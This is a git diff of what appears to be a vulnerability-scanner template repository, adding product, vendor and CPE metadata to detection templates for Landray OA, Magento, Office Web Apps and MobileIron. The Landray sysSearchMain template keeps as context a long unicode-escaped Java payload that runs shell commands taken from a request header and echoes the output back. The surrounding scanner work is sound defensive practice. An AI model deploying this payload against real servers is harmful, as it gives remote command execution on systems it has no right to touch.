+# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
index 51c3faf756..08ec9af8fe 100644
--- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
fofa-query: app="Landray-OA系统"
hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4"
+ product: landray_office_automation
+ vendor: landray
tags: landray,oa,dataxml,rce,replaceExtend
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
variables:
string: "{{randstr}}"
@@ -64,4 +68,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
index 7eb332e40f..5cd1adefe4 100755
--- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 1
fofa-query: app="Landray-OA系统"
+ product: landray_office_automation
+ vendor: landray
tags: landray,rce
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
variables:
payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d '
diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
index 2523c8afde..18c956350c 100755
--- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="Landray-OA系统"
+ product: landray_office_automation
+ vendor: landray
tags: landray,oa,treexml,rce
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml
index 6895f1f6dc..75580995df 100644
--- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml
+++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml
@@ -10,8 +10,12 @@ info:
metadata:
max-request: 3
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: magento
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/magento/magento-cacheleak.yaml b/http/vulnerabilities/magento/magento-cacheleak.yaml
index 934c3cd349..d7db864938 100644
--- a/http/vulnerabilities/magento/magento-cacheleak.yaml
+++ b/http/vulnerabilities/magento/magento-cacheleak.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: magento
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
index ce33597f4e..8ad4a0a339 100644
--- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
+++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 2
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: magento
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
index fa7f46bed7..03583ba456 100644
--- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
+++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
@@ -12,7 +12,11 @@ info:
max-request: 1
shodan-query: html:"Provide a link that opens Word"
fofa-query: body="Provide a link that opens Word"
+ product: office_web_apps_server
+ vendor: microsoft
tags: microsoft,office-webapps,redirect
+ classification:
+ cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:*
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
@@ -30,4 +34,4 @@ http:
- contains(body,' Interactsh Server
')
- status_code == 200
condition: and
-# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
index 18f22abfdc..988fc5b8c7 100644
--- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
@@ -17,10 +17,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-917
+ cpe: cpe:2.3:a:ivanti:mobileiron:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"MobileIron"
+ product: mobileiron
+ vendor: ivanti
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
index e1f861a16e..d61b12a21a 100644
